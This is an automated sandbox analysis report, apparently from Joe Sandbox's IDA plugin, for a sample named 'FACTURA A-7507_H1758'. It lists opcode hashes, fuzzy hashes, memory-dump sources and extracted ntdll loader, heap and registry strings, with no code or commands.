                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                                                                                                                                                          • API String ID: 0-3815128232
                                                                                                                                                                                                                          • Opcode ID: 55880826be266b7c17bb29936ec8c815d2bd5182f3daf0446f9de9df6ed58059
                                                                                                                                                                                                                          • Instruction ID: 86c06cbbcb055cfa6804221e3eec761d2d5a93072360fe2286bd306cd641d2b3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 55880826be266b7c17bb29936ec8c815d2bd5182f3daf0446f9de9df6ed58059
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE512578104350CEE39CCA29C864772F7E1EB45284F5248DEE4D68B686DB66E847DBA0
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                                                                                                                                                                          • API String ID: 0-1151232445
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • LdrpAllocateTls, xrefs: 354A194A
                                                                                                                                                                                                                          • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 354A1943
                                                                                                                                                                                                                          • minkernel\ntdll\ldrtls.c, xrefs: 354A1954
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                                                                                                                                                                          • API String ID: 0-4274184382
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • PreferredUILanguages, xrefs: 354EBD92
                                                                                                                                                                                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 354EBD45
                                                                                                                                                                                                                          • @, xrefs: 354EBD71
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                                                                                                          • API String ID: 0-2968386058
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 354BB2B2
                                                                                                                                                                                                                          • GlobalFlag, xrefs: 354BB30F
                                                                                                                                                                                                                          • @, xrefs: 354BB2F0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                                                                                                                                                                          • API String ID: 0-4192008846
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • LdrpInitializeTls, xrefs: 354A1851
                                                                                                                                                                                                                          • DLL "%wZ" has TLS information at %p, xrefs: 354A184A
                                                                                                                                                                                                                          • minkernel\ntdll\ldrtls.c, xrefs: 354A185B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                                                                                                                                                          • API String ID: 0-931879808
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 354B1D84
                                                                                                                                                                                                                          • Process initialization failed with status 0x%08lx, xrefs: 354B1D73
                                                                                                                                                                                                                          • LdrpInitializationFailure, xrefs: 354B1D7A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                          • API String ID: 0-2986994758
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: @$@
                                                                                                                                                                                                                          • API String ID: 0-149943524
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
• Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3446177414-0
                                                                                                                                                                                                                          • Opcode ID: d07a8362df7e4a93c484424914a1babf415e8c31e5aaeb9d2107ba7bb367e11d
                                                                                                                                                                                                                          • Instruction ID: ca3e224eed21d85c300fe41b1790a958cc5c5d844d1e9d677cbf4803d044cb2c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d07a8362df7e4a93c484424914a1babf415e8c31e5aaeb9d2107ba7bb367e11d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C5316F35302B02ABE74EDB65C941E8ABB76BF88754F404169E90587B60DB70AD31CBD0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3446177414-0
                                                                                                                                                                                                                          • Opcode ID: 851ac0e523f7d0a67ea570a2d0ca551742a61301871ee02fc087cb313df3b842
                                                                                                                                                                                                                          • Instruction ID: b9326c6ed79476f8004fe976ce12dd8e2a4fd86446940444b19d424de9716507
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 851ac0e523f7d0a67ea570a2d0ca551742a61301871ee02fc087cb313df3b842
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F911E772B14215ABEF09CF58C984B5EB7B9EB48660F11017EE445E3300DBB0DE01CBA4
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: @$AddD
                                                                                                                                                                                                                          • API String ID: 0-2525844869
                                                                                                                                                                                                                          • Opcode ID: 7a26bc4543c762408daf12117ec4ac6a6e692cd65150c62ea6d98d8c3d67dfd3
                                                                                                                                                                                                                          • Instruction ID: 8fc35d2b4610a9df98381f6a88ba6613da7490879e11127895073549b4f5fcdc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a26bc4543c762408daf12117ec4ac6a6e692cd65150c62ea6d98d8c3d67dfd3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5A17FB5608380AFD719CB14C844FABB7E9FF88744F504A2EF59587250E7B0E905CB62
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • RedirectedKey, xrefs: 3550B60E
                                                                                                                                                                                                                          • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 3550B5C4
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                                                                                                                                                                                          • API String ID: 0-1388552009
                                                                                                                                                                                                                          • Opcode ID: 47bae6f95a83eb85dd5ec96a1831ee7ca6d2cbc17736d06cb47ca2f55bf25509
                                                                                                                                                                                                                          • Instruction ID: 117aba825e9cf691e19dc7e4bfe3d1c91d231ae3b0dae4a44392b9cbf610261c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 47bae6f95a83eb85dd5ec96a1831ee7ca6d2cbc17736d06cb47ca2f55bf25509
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 836115B5C11218EFDB15DFD4D988AEEBBB8FB08714F50406AE805B7240DB34AA45CFA1
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: @[R5$@[R5@[R5
                                                                                                                                                                                                                          • API String ID: 0-2332972078
                                                                                                                                                                                                                          • Opcode ID: 470b93a760f658558ae8e31e581c6e50d891dabddcf873c746494a1992abe1c1
                                                                                                                                                                                                                          • Instruction ID: ad409a7f7322ba6d844ffd5808afbebf7c53a08b2610ac3e1e6ffda385d4cc66
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 470b93a760f658558ae8e31e581c6e50d891dabddcf873c746494a1992abe1c1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C51997020A742AFE32ACF24C941B1ABBF4FF48750F14095DF4A98B6A1E775E854CB91
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID: $$$
                                                                                                                                                                                                                          • API String ID: 3446177414-233714265
                                                                                                                                                                                                                          • Opcode ID: cd3ae6e9dd76f6797757afc9ca2c37f92bc970b9eb1a2692190d0ff041032de5
                                                                                                                                                                                                                          • Instruction ID: 56a9a69e534ed94925565f6a24930b3ce596c0f1e4fe9b5c1006d09fb95667b8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cd3ae6e9dd76f6797757afc9ca2c37f92bc970b9eb1a2692190d0ff041032de5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E761ADB5A41749EBFB28CFA4C580BADBBF2BB44704F5044ADD505AB790CB74B981CB90
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                                                                                                                                                          • API String ID: 0-118005554
                                                                                                                                                                                                                          • Opcode ID: bb4cbb9eae17f7f4c48ee8e00e467e1e6ae39ad85f68a19ee28402e735ec62ce
                                                                                                                                                                                                                          • Instruction ID: e3f98023bdd7ddb22787f522ce9c0d104b40b8959aa30588def550984fb49492
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bb4cbb9eae17f7f4c48ee8e00e467e1e6ae39ad85f68a19ee28402e735ec62ce
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BA31D0B9248740ABD309CB68D880B2AB7F4FFC5710F1408A9F8568B380FB71D905CB52
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: .Local\$@
                                                                                                                                                                                                                          • API String ID: 0-380025441
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 354A289F
                                                                                                                                                                                                                          • RtlpInitializeAssemblyStorageMap, xrefs: 354A289A
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                                                                                                                                                                                          • API String ID: 0-2653619699
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3446177414-0
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: @[R5@[R5
                                                                                                                                                                                                                          • API String ID: 0-1613323354
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3446177414-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3446177414-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
• Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3446177414-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3446177414-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3446177414-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3446177414-0
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                          • API String ID: 0-2766056989
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                          • API String ID: 0-2766056989
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: verifier.dll
                                                                                                                                                                                                                          • API String ID: 0-3265496382
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: #
                                                                                                                                                                                                                          • API String ID: 0-1885708031
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 3542FFF8
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode
                                                                                                                                                                                                                          • API String ID: 0-996340685
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: Flst
                                                                                                                                                                                                                          • API String ID: 0-2374792617
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID: 3xw3xw
                                                                                                                                                                                                                          • API String ID: 3446177414-576627920
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: c9c513d994af305f42dfd62e8d49853eb4e3348a752b1e973d35c8e05705344f
                                                                                                                                                                                                                          • Instruction ID: ee5a87f8e897881af98d8b6bf27cadab7a56ecb3d396b7708660267b30943673
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c9c513d994af305f42dfd62e8d49853eb4e3348a752b1e973d35c8e05705344f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7ED104B5A006449FEB59CF68C980B867BF9BF09340F0440BAED199B316EB71D905CBA0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 3d868c0b7ef3d168bb161449b229116fcb9620763cb767792156445e161bc8f1
                                                                                                                                                                                                                          • Instruction ID: b2f8c810eceea7155bb7a606a4cf2474415e0a4edcd91b1b784495791e7abef9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d868c0b7ef3d168bb161449b229116fcb9620763cb767792156445e161bc8f1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 88C1F1B5A457609BFB0CCF58C490BB9B3B1FB48B40F554199E8429B396EB70D942CBA0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 3df27d735eb94ad3aed72d0fedd6a76a0a55adeb03c4ee8ad24e64c1835c3795
                                                                                                                                                                                                                          • Instruction ID: f4f740d646a704e1ac633bc2ffa7670c9ec6c3f015f51851f4a3407f4cebb92b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3df27d735eb94ad3aed72d0fedd6a76a0a55adeb03c4ee8ad24e64c1835c3795
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EFC136B1A027059FDB19CFA8D841A9EBBF5FF48750F15806EE416AB361EB34A901CF50
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: c7c35de9a37a7072acc3c4c1be0a616c16e0d36e3f0098eb81a7862d70e1b1f0
                                                                                                                                                                                                                          • Instruction ID: fe60bdcec008ffa7414af5a3ab6daae8cfe669220d5f307452018b02e65e0619
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c7c35de9a37a7072acc3c4c1be0a616c16e0d36e3f0098eb81a7862d70e1b1f0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36918E71E0421AAFDF19CFA9D894BAEBBB5EF48710F104159E540EB340EBB5D9019BB0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: ae17e66443f7baa519c24b2dc3441132b9874fdc89d78cf6aae5b176c38f60aa
                                                                                                                                                                                                                          • Instruction ID: 2acac08eb50d50a35148513dd2d7ac4d3163b90767809dedfd050fec8c11bda5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae17e66443f7baa519c24b2dc3441132b9874fdc89d78cf6aae5b176c38f60aa
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7AB16DB9A0A306CFDB1CCF18D582B9977B1BB5C354F10459AE8219B3A1DB70D892DF90
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 4c29aa47f62e7395823bb0b9dbac7a55bdde0cfc349297c4bb1aac83eb5da543
                                                                                                                                                                                                                          • Instruction ID: a63f6bc4e5c452f0fae7c51f18b561302491e91f3542e1289a8932d6d9acbe56
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4c29aa47f62e7395823bb0b9dbac7a55bdde0cfc349297c4bb1aac83eb5da543
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 24A15875609342CFD308CF28C581A1ABBF6BF88744F14496EE5949B360EB70EA55CF92
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 4df71c31738c3cde0728cd101c237ae4b9a3368c0a631aa82a1bc992d5b7cfcc
                                                                                                                                                                                                                          • Instruction ID: 4591d8c25e3c4bf3e3283f1008b22100656a9df41217f2fa694d1efdbef122c6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4df71c31738c3cde0728cd101c237ae4b9a3368c0a631aa82a1bc992d5b7cfcc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2291F379944229ABDB19CF14CC40BE9B3B9BF49344F4081E9E988AB341E734DE95CF94
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
